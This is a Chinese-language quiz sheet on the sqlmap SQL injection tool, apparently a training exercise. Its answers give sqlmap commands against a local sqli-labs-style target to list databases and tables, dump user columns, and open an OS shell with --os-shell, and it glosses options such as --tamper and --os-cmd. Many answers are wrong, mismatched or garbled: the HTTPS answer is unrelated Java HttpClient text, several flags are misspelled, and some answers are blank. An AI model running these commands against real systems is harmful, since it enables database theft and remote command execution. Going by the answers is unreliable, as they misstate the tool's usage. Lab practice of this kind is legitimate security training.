天天看點
傳回

SQLmap  Check

SQLmap  Check

  1. 簡單的探測伺服器的主機資訊,以及資料庫的資訊

答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/

Less-1/?id=1” --dbs

  1. 已知網站的資料庫為Mysql資料庫,使用什麼指令會更快捷

答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/

Less-1/?id=1” --dbsmysql

  1. 檢視目前資料庫的名稱

答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/

Less-1/?id=1” –current -dbs

  1. 檢視目前資料庫有哪些表

答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/

Less-1/?id=1” –D security --tables 

  1. 檢視目前資料庫user表,并且以明文的方式展示

答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/

Less-1/?id=1” -D security -T users –columns 

  1. 已知Cookie資訊,如何使用它,并且擷取Shell會話

答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/

Less-1/?id=1” –os-shell

  1. 猜想某個URL可能存在Cookie注入,使用什麼指令探測

答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/

Less-1/?id=1” -level=2

  1. 猜想某個URL可能存在Referer注入,使用什麼指令探測

答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/

Less-1/?id=1” –level>=3

  1. 探測一個URL由于某種原因出現逾時情況,如何将SQLmap預設時間限制加大

答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/

Less-1/?id=1” –time-sec=3000

  1. 某次探測,由于是白盒測試,為了節省時間,需要加大掃描線程數,使用哪條指令

答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/

Less-1/?id=1” –thread 10

  1. 某次測試過程,發現網站對【'】做了過濾,導緻SQLmap加載Payload的時候出錯,請問使用哪條指令,可以使SQLmap加載Payload的時候對該過慮進行繞過

答:

  1. 測試的請求為POST請求,參數為user,id,需要使用哪條指令

答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/

Less-1/?id=1” –data=”user=1&id=2&submit=Submit” --dbs

  1. 測試過程由于節約時間,所有的SQLmap使用過程中彈出的選擇指令時,都選擇其預設選項,這種情況應該使用哪條指令

答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/

Less-1/?id=1” –dbs --batch

  1. 測試過程,由于需要掃描多個URL,這時會将所有的URL 放在url.txt檔案,如何使用該檔案

答:sqlmap.py –u “http://127.0.0.1:8086/sqli-frame/

Less-1/?id=1” –D security –T users –C -dump

  1. 如果請求是HTTPS時,需要加哪個參數

答:(1) 使用最多的是UrlEncodedFormEntity類。通過該類建立的對象可以模拟傳統的HTML表單傳送POST請求中的參數。

(2) 除了傳統的application/x-www-form-urlencoded表單,我們另一個經常用到的是上傳檔案用的表單,這種表單的類型為 multipart/form-data。在HttpClient程式擴充包(HttpMime)中專門有一個類與之對應,那就是 MultipartEntity類。此類同樣實作了HttpEntity接口。

以下部分為開卷,答完後盡可能記住

  1. --union-char該指令的含義,以及使用場景

答:–union-char=UCHAR 用于暴力猜解列數的字元

  1. --delay指令的含義,以及使用場景

答:–delay=DELAY 在每個HTTP請求之間的延遲時間,機關為秒

  1. --safe-url指令的含義,以及使用場景

答:–safe-url=SAFURL 在測試過程中經常通路的url位址

  1. sqlmap -v指令的含義,具體有哪幾個字尾選項

答:-v 0-6   詳細級别

   -v VERBOSE 詳細級别:0-6(預設為1)

  1. --param-del 指令的含義,以及具體使用方法

答:

  1. --user-agent,--random-agent兩個指令的含義,以及使用情景

答:–user-agent=AGENT 指定 HTTP User – Agent頭

--random-agent   構造随機的user-agent

–random-agent 使用随機標明的HTTP User – Agent頭

  1. --auth-type,--auth-cred兩個指令的含義,以及使用情景

答:–auth-type=ATYPE HTTP身份驗證類型(基本,摘要或NTLM)(Basic, Digest or NTLM)

   –auth-cred=ACRED HTTP身份驗證憑據(使用者名:密碼)

  1. --tamper指令的含義,以及使用情景

答:–tamper=TAMPER 使用給定的腳本(S)篡改注入資料

  1. --risk指令的含義,以及使用情景

答:–risk=RISK 執行測試的風險(0-3,預設為1)

  1. --os-cmd,--os-shell兩個指令的含義,以及使用情景

答:–os-cmd=OSCMD 執行作業系統指令

    –os-shell 互動式的作業系統的shell

  1. SQLmap與Meterpreter聯合使用

答:

SQLmap  Check
上一篇: 2021-08-16
下一篇: apache安裝及配置